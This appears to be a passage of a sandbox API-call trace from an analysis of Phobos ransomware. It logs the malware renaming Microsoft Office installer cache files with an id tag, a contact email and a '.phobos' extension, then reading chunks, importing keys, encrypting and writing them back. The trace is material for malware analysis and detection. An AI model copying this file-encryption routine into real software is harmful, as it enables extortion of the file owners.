(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab")) returned 0x2020 [0149.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0149.084] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0149.084] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0149.084] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0149.084] ReadFile (in: hFile=0x14c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0149.183] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0149.183] ReadFile (in: hFile=0x14c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0149.216] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0149.216] ReadFile (in: hFile=0x14c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0149.676] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa327e8) returned 1 [0149.676] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0149.676] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0149.683] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.683] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0149.683] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0149.700] SetEndOfFile (hFile=0x14c) returned 1 [0149.700] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0149.700] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0149.701] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0149.701] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0149.702] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0149.702] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0149.703] CloseHandle (hObject=0x14c) returned 1 [0149.703] SetEvent (hEvent=0xe8) returned 1 [0149.703] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0149.703] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0149.703] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=21064532) returned 1 [0149.703] CloseHandle (hObject=0x14c) returned 1 [0149.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab")) returned 0x2020 [0149.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0149.952] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0149.952] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0149.952] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0149.952] ReadFile (in: hFile=0x14c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0150.039] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0150.039] ReadFile (in: hFile=0x14c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0150.263] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0150.263] ReadFile (in: hFile=0x14c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0150.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0150.276] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0150.277] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0150.283] CryptDestroyKey (hKey=0xa32da8) returned 1 [0150.283] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0150.283] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0150.336] SetEndOfFile (hFile=0x14c) returned 1 [0150.336] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0150.336] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0150.338] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0150.338] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0150.339] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0150.339] WriteFile (in: hFile=0x14c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0150.340] CloseHandle (hObject=0x14c) returned 1 [0150.340] SetEvent (hEvent=0xe8) returned 1 [0150.340] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0150.340] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0150.341] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2928955) returned 1 [0150.341] CloseHandle (hObject=0x14c) returned 1 [0150.341] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020 [0150.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0150.342] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0150.342] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0150.342] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0150.342] ReadFile (in: hFile=0x14c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0150.408] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0150.408] ReadFile (in: hFile=0x14c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0150.487] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0150.487] ReadFile (in: hFile=0x14c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0150.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32de8) returned 1 [0150.560] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0150.560] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0150.676] CryptDestroyKey (hKey=0xa32de8) returned 1 [0150.676] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0150.676] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0151.367] SetEndOfFile (hFile=0x14c) returned 1 [0151.367] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0151.367] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0151.369] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0151.369] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0151.372] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0151.372] WriteFile (in: hFile=0x14c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0151.373] CloseHandle (hObject=0x14c) returned 1 [0151.373] SetEvent (hEvent=0xe8) returned 1 [0151.374] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0151.374] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0151.375] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=50823389) returned 1 [0151.375] CloseHandle (hObject=0x15c) returned 1 [0151.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020 [0151.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0151.375] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0151.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0151.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0151.376] ReadFile (in: hFile=0x15c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0151.696] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0151.696] ReadFile (in: hFile=0x15c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0151.794] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0151.794] ReadFile (in: hFile=0x15c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0151.993] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32c28) returned 1 [0151.993] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0151.993] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0151.999] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.999] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0151.999] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0152.016] SetEndOfFile (hFile=0x15c) returned 1 [0152.016] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0152.016] WriteFile (in: hFile=0x15c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0152.018] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0152.018] WriteFile (in: hFile=0x15c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0152.019] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0152.019] WriteFile (in: hFile=0x15c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0152.020] CloseHandle (hObject=0x15c) returned 1 [0152.020] SetEvent (hEvent=0xe8) returned 1 [0152.021] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0152.021] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0152.021] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2503680) returned 1 [0152.021] CloseHandle (hObject=0x15c) returned 1 [0152.021] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 0x2020 [0152.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0152.022] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0152.022] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0152.022] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0152.022] ReadFile (in: hFile=0x15c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 